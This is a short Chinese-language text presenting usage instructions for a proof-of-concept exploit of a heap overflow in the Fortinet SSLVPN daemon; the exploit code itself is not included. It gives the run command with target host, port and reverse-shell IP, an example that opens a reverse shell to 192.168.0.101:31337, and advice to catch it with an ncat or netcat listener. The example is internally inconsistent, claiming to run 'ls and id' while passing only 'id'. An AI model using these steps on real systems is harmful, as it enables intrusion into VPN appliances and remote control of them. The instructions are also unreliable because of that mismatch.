利用 Fortinet SSLVPN 守护进程中堆溢出的 POC 代码
pip install pwntools 要使用此代码,你可以将其保存到文件中,例如 exploit.py,然后在命令行中使用 Python 运行它,并传入所需参数。以下是运行该漏洞利用程序的示例命令:
python exploit.py <target_host> <target_port> <reverse_ip>
将 <target_host> 替换为目标系统的主机名或 IP 地址,将 <target_port> 替换为易受攻击服务的端口号,将 <reverse_ip> 替换为您希望接收 shell 的机器 IP 地址。其余参数是您要执行的命令,以空格分隔。
例如,如果目标系统的 IP 地址为 192.168.0.100,易受攻击的服务运行在 8080 端口,并且您想执行 ls 和 id 命令,则可以运行以下命令:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
这将创建到 192.168.0.101:31337 的反向 shell 连接,并在目标系统上执行 ls 和 id 命令。请注意,您需要在指定的 IP 地址和端口上运行监听器以接收反向 shell。您可以使用 ncat 或 netcat 等工具来创建监听器。